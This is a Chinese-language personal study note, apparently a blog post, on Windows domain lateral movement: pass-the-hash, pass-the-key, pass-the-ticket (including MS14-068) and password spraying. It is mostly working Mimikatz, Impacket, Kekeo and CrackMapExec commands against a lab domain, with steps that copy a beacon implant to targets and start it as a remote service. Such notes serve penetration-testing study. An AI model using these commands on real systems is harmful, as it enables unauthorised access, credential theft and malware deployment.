• 7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射


    用途:个人学习笔记,有所借鉴,欢迎指正

    目录

    一、域横向移动-PTH-Mimikatz&NTLM

    1、Mimikatz

    2、impacket-at&ps&wmi&smb

    二、域横向移动-PTK-Mimikatz&AES256

    三、域横向移动-PTT-漏洞&Kekeo&Ticket

     1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

    2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

    3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

    四、Linux系统+Proxychains+CrackMapExec-密码喷射


    一、域横向移动-PTH-Mimikatz&NTLM

    PTH=Pass The Hash,通过密码散列值(通常是NTLM Hash)来进行攻击。
    在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。
    因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方
    法登录到内网主机的其他计算机。另外注意在window Server 2012 R2之前使用到的密
    码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

    1、Mimikatz

    1. mimikatz privilege::debug
    2. mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
    3. net use \\192.168.3.32/c$
    4. copy beacon.exe \\192.168.3.32\c$
    5. sc \\sqlserver create bindshell binpath="c:\4444.exe"
    6. sc \\sqlserver start bindahell

    2、impacket-at&ps&wmi&smb

    1. Psexec -hashes :NTLM值 域名/域用户@域内ip地址
    2. smbexec -hashes :NTLM值 域名/域用户@域内ip地址
    3. wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
    4. python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
    5. python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
    6. python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

    二、域横向移动-PTK-Mimikatz&AES256

    PTK=Pass The Key,当系统安装了KB2871997补丁且禁用了NTLM的时候,
    那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。

    1. mimikatz sekurlsa::ekeys
    2. mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 

    三、域横向移动-PTT-漏洞&Kekeo&Ticket

    资源地址:

    https://github.com/abatchy17/windowsExploits/tree/master/MS14-068
    https://github.com/gentilkiwi/kekeo/releases

     1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

    MS14-068是密钥分发中心(KDC)服务中的windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

    注意:成功不成功看DC域控漏洞补丁打没打

    1. 获取SID值:shell whoami/user
    2. 生成票据文件:shell ms14-068.exe -u webadmin@god.org -s
    3. s-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
    4. 清除票据连接:
    5. shell klist purge
    6. 内存导入票据:
    7. mimikatz kerberos:ptc TGT_webadmin@god.org.ccache
    8. 连接目标上线:
    9. shell dir \\OWA2010CN-GOD\c$
    10. shell net use \\OWA2010CN-GOD\c$
    11. copy beacon.exe \\OWA2010CN-GOD/c$
    12. sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
    13. sc \\OWA2010CN-GOD start bindshell

    2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

    因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
    我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
    缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。

    注意:成功率看ntlm哈希值的正确性

    1. 生成票据:shell kekeo "tgt::ask /user:Administrator /domain god.org /ntim:ocef208c6485269c20db2cad21734fe7" "exit"
    2. 导入票据: shell kekeo "kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi " "exit"
    3. 查看票据:shell klist
    4. 利用票据连接:shell dir \\owa2010cn-god\c$

    3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

    1. 导出票据:
    2. mimikatz sekurlsa::tickets /export
    3. 导入票据:
    4. mimikatz kerberos::ptt C:
    5. \Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbi
    6. shell klist

    四、Linux系统+Proxychains+CrackMapExec-密码喷射

    CrackMapExec
    https://github.com/Porchetta Industries/CrackMapExec
    官方手册:https://mpgn.gitbook.io/crackmapexec/
    部分案例:https://www.freebuf.com/sectool/184573.html

    下载对应release,建立socks连接,设置socks代理,配置规则,调用!
    Linux系统代理工具: Proxychains使用
    安装使用:
    https://blog.csdn.net/qq_53086690/article/details/121779832
    代理配置:Proxychains.conf
    代理调用:Proxychains 命令                 

    1. #域用户HASH登录
    2. proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c
    3. #本地用户HASH登录
    4. proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --1ocal-auth    
  • 相关阅读:
    GCC使用入门
    【高并发】深入解析Callable接口
    Error: error:0308010C:digital envelope routines::unsupported
    记Windows服务器Redis 6379被攻击 被设置主从模式同步项目数据
    JDBC概述
    Mybatis学习笔记11 缓存相关
    css知识学习系列(17)-每天10个知识点
    简单的个人博客网站设计 静态HTML个人博客主页 DW个人网站模板下载 大学生简单个人网页作品代码 个人网页制作 学生个人网页设计作业
    Ubuntu 20.04安装ipopt和cppAD(安装全流程+报错解决)
    D-莲子的物理热力学
  • 原文地址:https://blog.csdn.net/m0_65842464/article/details/136128706